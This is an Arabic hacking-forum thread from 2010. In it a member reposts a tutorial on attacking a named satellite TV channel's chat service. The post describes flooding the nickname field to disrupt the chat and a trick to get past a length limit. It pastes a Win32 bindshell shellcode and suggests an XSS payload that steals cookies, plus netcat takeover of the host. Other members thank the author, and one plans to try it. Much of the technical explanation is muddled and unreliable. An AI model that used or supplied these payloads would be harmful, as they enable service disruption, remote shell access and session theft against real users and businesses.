TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > القسم الاخباري والتقني > القسم العام

القسم العام يحتوي على خواطر وابداعات الاعضاء سواء كانت ام ام تكن خاصه بالحمايه والاختراق

 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 25-09-2010, 03:59 PM
الصورة الرمزية indoushka
indoushka
عضو نشيط
 
حـالة التــواجـد : indoushka غير متواجد حالياً
تاريخ التسجيل: Jun 2010
الجــــنــــــس: ذكـر
المشاركات: 62
شكراً:2
تم شكره 59 مرة في 28 مشاركة
معدل تقييم المستوى: 10
indoushka على طريق التميز
Exclamation اختراق Chat القنوات الفضائيه!

بسم الله الرحمن الرحيم

السلام عليكم

هذا الدرس طرح سنة Sep 14 2005, 12:59 AM
انا اريد اعادة طرح فقط للاستفادة الموضوع قيم ولكن جيد
على العموم الدرس هيبعد عن السلسله بحد ما ولكن مرتبط باول موضوع فيها

طبعا فى ظل الظروف الراهنه والقنوات الفضائيه نازله ترخ على دماغتنا والفيديو كليب الى اكل

دماغ شبابنا ربنا يستر على الجيل ده جيل الديموقراطيه ...

الموضوع ده اكتشفته من حوالى سنه بس كنت بحاول اطور نفسى فيه يعنى مثلا افهم

لغه الchat وهى الجافا (java) التى تتعامل مع الجوال (الموبايل) انا لست برمجا جافا

من عمل رسائل مصوره بالفيديو والعاب الى اخره ....الهم

لنكون سباقين بالمواضيع عن الغرب نخش فى الموضوع ..

هتكون ضحيتنا قناه ميلودى الانجليزيه وليست العربيهmelody


كيف اتيت بالثغره؟!!

لكى تقو بتسجيل فى قناتنا يجب ان تضغط على ** ثم الاسم المستعار

تذكر الدرس السابق وتفهمه لكى تعرف كيف جاءت هذه الثغره لاتنزل لاسفل لتعرف الحل

اعرفها وبعد كده انزل لتحت


كيف جاءت الثغره؟!!

لب المشكله ياتى فى هاتين العلامتين ** لو حتى لا تفقه شىء فى لغه الjava ولا عمرك

سمعت عنها ولو يوجد عندك شويه معلوات بالمتغيرات او اى لغه اخرى مكن تعرفها زى بكل سهوله

عندما تضغط على هاتين العلامتين** يقو م بحجز متغير!!!

لماذا ليقو بالتسجيل اسمك المستعار بهذا الشكل **bigboss وبعد ان يقو م بالتسجيل فى القناه

يكون هكذا bigboss: كل شويه بقرب من النقطه المهمه

اعتقد ان النقطه بانت وواضح انها ثغره BuFFer OvErFloW ولاحظ ايضا ان المبرمج لم يتم اخذ

الامان !! سنعرفها اسفل ..


استغلال الثغره ؟!!

الاستغلال لحد وقتنا هذا لم اكتبه لانى لست مبرمج للجافا ولكن عندى طريق تعمل على حجب

خدمه الاتشات **aaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaa aaaaaaaaaeslam eslam bigboss
من القناه وهى كالاتى تقوم بالتسجيل باكتر من حرف فى المتغير هكذا ..

الى ان ينتهى بك الحال الى 255 حرف الى موجود عندك على الموبايل اعتقد او اقل من كده

وارسل وسجل وارسل اى رساله سيقوم الاتشات بالحجب وستلاحظ ايضا.. ان الاسم المستعار

طفح او عمل overflow على الاعلانات التى توجد بداخل القناه

طريقت اغلاقها ؟!!

طبعا القناه عرفت المشكله وقامو ***ق المتغير او ** الى 12 حرف

يجب الا يزيد عدد الحروف الاسم المستعار عن 12 حرف

طبعا اتقفلت الثغره وطبعا انا حابب انكم تجربوها على اكتر من قناه

تجاوز المشكله.؟!!

ممكن اتجاوز المشكله التى هى 12حرف بعمل الابتسمات على اسمك المستعار هكذا

** : ( اى ابتسامات وعدم كتابت اى حروف فى الاسم المستعار

ان بصراحه لسه ما جربتها ومست***م تجربوها لانى مشغول جداااااا حاليا والله يعلم بحالى

وممكن نرفق shell code بالجافا مثل هذا

# Win32 bindshell (port 28876) - SkyLined
my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120% u 31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac% u 85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b% u 8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031% u 8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866% u 6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7% u e8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154% u fec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0% u 5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff% u 31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a% u 5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb% u 58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347% u c656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964% u 41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353% u 5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350% u 5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8% u fffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe% u 56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c% u 89eb\");\n";

اخذته من ثغرهhttp://www.milw0rm.com/id.php?id=1079

وناتى بالادوار الاحترافيه مثل نعرف رقم ip الجهاز الذى يعمل الchat عليه ثم نتصل بالNETCAT

ونسيطر على القناه ولكن هذه فعلا ادوار الهاكر المحترف والحقيقى ليخسر شركه زى

ميلودى او اى قناه اخرى...

وطريقه مثل كود الجافا خبيث مثل هذا <استبدال script>alert(استبدال document.cookie);</استبدال Script>

ارفقه فى الاسم المستعار واشتغل  
رد مع اقتباس
4 أعضاء قالوا شكراً لـ indoushka على المشاركة المفيدة:
  #2  
قديم 28-09-2010, 09:59 PM
الصورة الرمزية Sec4ever
Sec4ever
الحماية للأبد
 
حـالة التــواجـد : Sec4ever غير متواجد حالياً
تاريخ التسجيل: Oct 2009
مكـان الإقامـة : الحماية للأبد
الجــــنــــــس: ذكـر
الــهـــوايـــــة: النـــــــــوم :)
المشاركات: 3,734
شكراً:3,307
تم شكره 5,043 مرة في 914 مشاركة
معدل تقييم المستوى: 10
Sec4ever تم تعطيل التقييم
افتراضي

يعطيك الصحة خويا اندوشكا .  

 

 

My Adversary completes me,
to disrespect him is to disrespect myself,
thanks to his presence.
رد مع اقتباس
  #3  
قديم 30-09-2010, 09:19 AM
الصورة الرمزية Mr.Filter
Mr.Filter
عضو جديد
 
حـالة التــواجـد : Mr.Filter غير متواجد حالياً
تاريخ التسجيل: Sep 2010
الجــــنــــــس: ذكـر
المشاركات: 3
شكراً:0
تم شكره 0 مرة في 0 مشاركة
معدل تقييم المستوى: 0
Mr.Filter على طريق التميز
افتراضي

سلمت

الله يعطيك العاافيه

لاهنت  
رد مع اقتباس
  #4  
قديم 02-10-2010, 12:45 AM
الصورة الرمزية G705T H4CK3r
G705T H4CK3r
عضو مميز
TeaM C
 
حـالة التــواجـد : G705T H4CK3r غير متواجد حالياً
تاريخ التسجيل: Aug 2010
مكـان الإقامـة : On Syrian Technical
الجــــنــــــس: ذكـر
الــهـــوايـــــة: Basketball
المشاركات: 159
شكراً:9
تم شكره 41 مرة في 12 مشاركة
معدل تقييم المستوى: 10
G705T H4CK3r على طريق التميز
افتراضي

مشكور على الطريقة اندوشكا

وان شاء الله بجربها في اقرب فرصة  

 

 

رد مع اقتباس
  #5  
قديم 22-05-2017, 07:04 PM
الصورة الرمزية indoushka
indoushka
عضو نشيط
 
حـالة التــواجـد : indoushka غير متواجد حالياً
تاريخ التسجيل: Jun 2010
الجــــنــــــس: ذكـر
المشاركات: 62
شكراً:2
تم شكره 59 مرة في 28 مشاركة
معدل تقييم المستوى: 10
indoushka على طريق التميز
افتراضي رد: اختراق Chat القنوات الفضائيه!

بالتوفيق للجميع  
رد مع اقتباس
  #6  
قديم 24-05-2017, 11:24 PM
الصورة الرمزية Mr-DoYl
Mr-DoYl
عضو نشيط
 
حـالة التــواجـد : Mr-DoYl غير متواجد حالياً
تاريخ التسجيل: Feb 2012
الجــــنــــــس: ذكـر
المشاركات: 70
شكراً:43
تم شكره 35 مرة في 21 مشاركة
معدل تقييم المستوى: 0
Mr-DoYl بدون تقييم
افتراضي رد: اختراق Chat القنوات الفضائيه!

اقتباس:
المشاركة الأصلية كتبت بواسطة indoushka مشاهدة المشاركة

بالتوفيق للجميع


2010

استغربت اصلا لما شفت رابط milw0rm
ايش الي رجعه هههههههههه  
رد مع اقتباس

الكلمات الدلالية (Tags)
الفضائيه, القنوات, chat, اختراق


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
نقاش اختراق المحطات (القنوات) حقيقة ؟ MadjiX القسم العام 17 15-09-2010 05:14 PM
[webapps] - PHP Chat for 123 Flash Chat Remote File Inclusion Vulnerability Sec4ever قسم جديد ثغرات مواقع الحماية 0 21-07-2010 03:34 AM
[webapps] - PHP Chat for 123 Flash Chat Remote File Inclusion Vulnerability Sec4ever قسم جديد ثغرات مواقع الحماية 0 21-07-2010 03:11 AM


الساعة الآن 09:19 AM